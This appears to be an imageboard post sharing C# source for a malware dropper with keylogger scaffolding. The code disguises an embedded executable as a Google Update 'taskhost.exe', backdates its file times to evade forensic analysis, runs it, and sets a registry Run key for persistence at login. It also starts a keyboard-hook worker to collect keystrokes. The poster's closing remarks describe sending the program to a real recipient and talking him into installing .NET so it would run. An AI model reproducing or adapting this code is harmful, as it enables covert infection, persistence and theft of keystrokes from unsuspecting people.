/* dropper fragment - background worker to drop embedded resource */
private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
{
try {
// pretend to be part of google update
string outfile = Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google"), "Update");
// innocent sounding name
outfile = Path.Combine(outfile, "taskhost.exe");
// extract from embedded resource and write
using (Stream input = Assembly.GetExecutingAssembly().GetManifestResourceStream("dropper.taskhost.exe"))
using (Stream output = File.Create(outfile))
{
CopyStream(input, output);
output.Close();
input.Close();
}
// give it a time in the past to avoid analysis of when it was dropped
try {
File.SetLastWriteTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
File.SetCreationTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
} catch {}
// run it
System.Diagnostics.Process.Start(outfile);
try {
// and make it run every login
Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
key.SetValue("Google Update Taskhost", "\"" + outfile + "\" -update");
} catch {}
}
catch {}
}
// start background worker to process collected keystrokes
bw1 = new BackgroundWorker();
bw1.DoWork += new DoWorkEventHandler(bw1_DoWork);
bw1.RunWorkerAsync();
// run message loop
Application.Run();
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
/* code to handle key events and add them to a queue would be here */
>>6
I needed to code a something up quickly so I used C# instead of fucking around with Sepples nonsense. The joke was on me though as the recipient was using an old version of XP that didn't have .NET Framework installed. Fortunately though, I managed to convince him to install it.